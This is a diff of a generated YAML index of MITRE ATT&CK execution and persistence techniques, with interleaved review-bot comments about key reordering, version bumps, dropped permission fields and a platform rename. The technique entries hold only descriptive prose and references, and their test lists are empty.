- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Process: Process Access'
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ created: '2020-02-12T14:08:48.689Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1559
+ external_id: T1559
+ - source_name: Fireeye Hunting COM June 2019
+ description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+ 10, 2019.
+ url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+ - source_name: Linux IPC
+ description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+ March 11, 2022.
+ url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1559
atomic_tests: []
+ T1059.011:
+ technique:
+ modified: '2024-10-01T15:19:54.163Z'
+ name: Lua
+ description: |-
+ Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua
), or from Lua-embedded programs (through the struct lua_State
).(Citation: Lua main page)(Citation: Lua state)
+
+ Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Script: Script Execution'
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+ created: '2024-08-05T18:19:42.201Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/011
+ external_id: T1059.011
+ - source_name: Kaspersky Lua
+ description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+ APT. Retrieved August 5, 2024.
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+ - source_name: Lua main page
+ description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+ url: https://www.lua.org/start.html
+ - source_name: Lua state
+ description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+ url: https://pgl.yoyo.org/luai/i/lua_State
+ - source_name: Cyphort EvilBunny
+ description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+ Instrumented By Lua. Retrieved August 5, 2024.'
+ url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+ - source_name: PoetRat Lua
+ description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+ public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+ url: https://blog.talosintelligence.com/poetrat-update/
+ - source_name: Lua Proofpoint Sunseed
+ description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+ Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+ Malware to Target European Governments and Refugee Movement. Retrieved August
+ 5, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1204.003:
technique:
x_mitre_platforms:
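Review bot: for T1559 the substantive changes in this hunk are the `x_mitre_version` bump from '1.2' to '1.3', the dropped `x_mitre_permissions_required` list (Administrator, User, SYSTEM) and the new `x_mitre_deprecated: false` / `revoked: false` flags, but they are buried under a full reordering of every key and of the `external_references` entries. If the generator can emit keys in a stable order the content changes become reviewable at a glance; otherwise consider splitting the reorder from the data refresh. The new T1059.011 (Lua) entry ships with `x_mitre_detection: ''` and `atomic_tests: []`, which is expected for a freshly added technique with no atomics yet; just confirm that whatever renders the index treats an empty detection string the same as a missing key.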
@@ -26291,7 +26670,7 @@ execution:
url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
Supply Chain and Infrastructure. Retrieved August 26, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-26T16:42:35.318Z'
name: 'User Execution: Malicious Image'
description: |-
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
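Review bot: the `modified` timestamp for T1204.003 moves backwards here, from 2022-04-25 to 2021-08-26, the opposite direction of every other `modified` change in this patch. Together with this entry keeping its `x_mitre_permissions_required` list as unchanged context in the following hunk while the other refreshed entries lose that key, it looks as though T1204.003 was regenerated from a different (older) source snapshot; please confirm that is intended before merging.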
@@ -26318,30 +26697,12 @@ execution:
- 'Instance: Instance Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1204.003
atomic_tests: []
T1203:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1203
- url: https://attack.mitre.org/techniques/T1203
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:34:23.908Z'
+ name: Exploitation for Client Execution
description: |-
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
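Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1204.003, but unlike T1559 or T1569 nothing in the visible hunks for this entry re-adds an `x_mitre_attack_spec_version` (T1648, by contrast, gets one inserted right after `kill_chain_phases`). Check that the key still exists earlier in the regenerated T1204.003 block; if it does not, this entry ends up with no ATT&CK spec version at all.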
@@ -26358,9 +26719,10 @@ execution:
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Client Execution
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -26368,21 +26730,37 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
+ - 'File: File Modification'
- 'Application Log: Application Log Content'
+ - 'Network Traffic: Network Traffic Flow'
+ x_mitre_remote_support: false
x_mitre_system_requirements:
- Remote exploitation for execution requires a remotely accessible service reachable
over the network or other vector of access such as spearphishing or drive-by
compromise.
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+ created: '2018-04-18T17:59:24.739Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1203
+ external_id: T1203
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.006:
technique:
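Review bot: T1203 gains two data sources in this hunk ('File: File Modification' and 'Network Traffic: Network Traffic Flow') while `x_mitre_version` is re-emitted unchanged as '1.4' and `modified` jumps to 2024-10-15. A data-source change with no version bump is unusual, so verify that '1.4' really matches the upstream ATT&CK object for this technique rather than being carried over from the removed block.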
@@ -26432,28 +26810,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.006
atomic_tests: []
T1569:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
- type: attack-pattern
- created: '2020-03-10T18:23:06.482Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569
- url: https://attack.mitre.org/techniques/T1569
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-20T19:55:40.527Z'
name: System Services
description: Adversaries may abuse system services or daemons to execute commands
or programs. Adversaries can execute malicious content by interacting with
@@ -26464,32 +26825,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for command line invocations of tools capable of
modifying services that doesn’t correspond to normal usage patterns and known
software, patch cycles, etc. Also monitor for changes to executables and other
files associated with services. Changes to Windows services may also be reflected
in the Registry.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- 'Service: Service Creation'
- 'File: File Modification'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+ created: '2020-03-10T18:23:06.482Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569
+ external_id: T1569
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1059.003:
technique:
- modified: '2024-03-01T17:35:02.889Z'
+ modified: '2024-10-15T15:19:56.540Z'
name: 'Command and Scripting Interpreter: Windows Command Shell'
description: |-
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
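Review bot: `x_mitre_permissions_required` (User, Administrator, SYSTEM, root) is dropped from T1569 here, as it is from T1559 and T1204.001 elsewhere in the patch, with no replacement key. Any tooling that reads this field, for instance to derive an elevation hint for a technique, now has to tolerate its absence; that deserves a line in the commit message. The `x_mitre_version` bump from '1.2' to '1.3' is the only other content change in this hunk.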
@@ -26532,12 +26905,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.003
atomic_tests: []
T1651:
technique:
- modified: '2024-04-12T03:27:48.171Z'
+ modified: '2024-10-15T13:42:42.543Z'
name: Cloud Administration Command
description: |-
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26594,11 +26966,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:43:27.104Z'
name: 'Command and Scripting Interpreter: Visual Basic'
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26663,14 +27034,13 @@ execution:
url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.005
atomic_tests: []
T1648:
technique:
- modified: '2024-03-05T16:13:38.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Serverless Execution
description: "Adversaries may abuse serverless computing, integration, and automation
services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26691,14 +27061,19 @@ execution:
an adversary may create a Lambda function that automatically adds [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
and a corresponding CloudWatch events rule that invokes that function whenever
- a new user is created.(Citation: Backdooring an AWS account) Similarly, an
- adversary may create a Power Automate workflow in Office 365 environments
- that forwards all emails a user receives or creates anonymous sharing links
- whenever a user is granted access to a document in SharePoint.(Citation: Varonis
- Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+ a new user is created.(Citation: Backdooring an AWS account) This is also
+ possible in many cloud-based office application suites. For example, in Microsoft
+ 365 environments, an adversary may create a Power Automate workflow that forwards
+ all emails a user receives or creates anonymous sharing links whenever a user
+ is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+ Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+ environments, they may instead create an Apps Script that exfiltrates a user's
+ data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+ OWN-CERT Google App Script 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Praetorian
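Review bot: for T1648 the `x_mitre_attack_spec_version: 3.2.0` key is inserted immediately after `kill_chain_phases` (and `x_mitre_modified_by_ref` lands between `x_mitre_is_subtechnique` and `x_mitre_platforms` in the following hunk), whereas every other refreshed entry in this patch places both keys at the end after `object_marking_refs`. The YAML is still valid, but one generated file should not carry two key orders; pick one and regenerate. The reworded description introduces two citation keys, `Cloud Hack Tricks GWS Apps Script` and `OWN-CERT Google App Script 2024`, and both do get matching `source_name` entries further down, so the references stay consistent.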
@@ -26707,16 +27082,18 @@ execution:
- Varonis Threat Labs
- Alex Soler, AttackIQ
- Vectra AI
+ - OWN
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'Application Log: Application Log Content'
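Review bot: the platform rename from `Office 365` to `Office Suite` in `x_mitre_platforms` is a data change, not a cosmetic one: anything that selects techniques by the literal platform string (per-platform index files, filters in the generator) will silently stop matching T1648 until it learns the new name. Please grep the generators and sibling indexes for the old literal, and mention the rename in the commit message alongside the `x_mitre_version` bump to '1.1' and the added `OWN` contributor.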
@@ -26742,6 +27119,14 @@ execution:
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
+ - source_name: Cloud Hack Tricks GWS Apps Script
+ description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+ 2024.
+ url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+ - source_name: OWN-CERT Google App Script 2024
+ description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+ analysis. Retrieved October 2, 2024.
+ url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
- source_name: Cado Security Denonia
description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -26756,29 +27141,10 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- created: '2020-03-11T14:43:31.706Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-10T16:40:03.786Z'
name: Malicious Link
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
@@ -26791,25 +27157,41 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: |-
Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+ created: '2020-03-11T14:43:31.706Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1204/001
+ external_id: T1204.001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1569.002:
technique:
- modified: '2023-08-14T15:53:00.999Z'
+ modified: '2024-10-15T16:41:40.247Z'
name: 'System Services: Service Execution'
description: |-
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe
) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe
and [Net](https://attack.mitre.org/software/S0039).
@@ -26859,17 +27241,16 @@ execution:
url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1569.002
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
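Review bot: the T1053.002 `description` is one long line, so the minus/plus pair here shows the whole paragraph as replaced even though the only difference is the appended sentence about scheduling through the `Win32_ScheduledJob` WMI class (citing `Malicious Life by Cybereason`). Comparing the two lines, the earlier text is identical; a word-level diff (`git diff --word-diff`) would make that reviewable at a glance. The new citation key does get a matching `source_name` in a later hunk.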
@@ -26932,7 +27313,7 @@ execution:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -26966,8 +27347,8 @@ execution:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -26976,6 +27357,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
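Review bot: the URL for the new `Malicious Life by Cybereason` reference ends in a `#blog-subscribe` fragment, which is the page's subscription widget anchor rather than part of the article location; the reference should point at the article itself. Because the index mirrors upstream ATT&CK text the trim belongs in the upstream source rather than a hand edit here, but it is worth reporting.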
@@ -26988,29 +27373,29 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
persistence:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
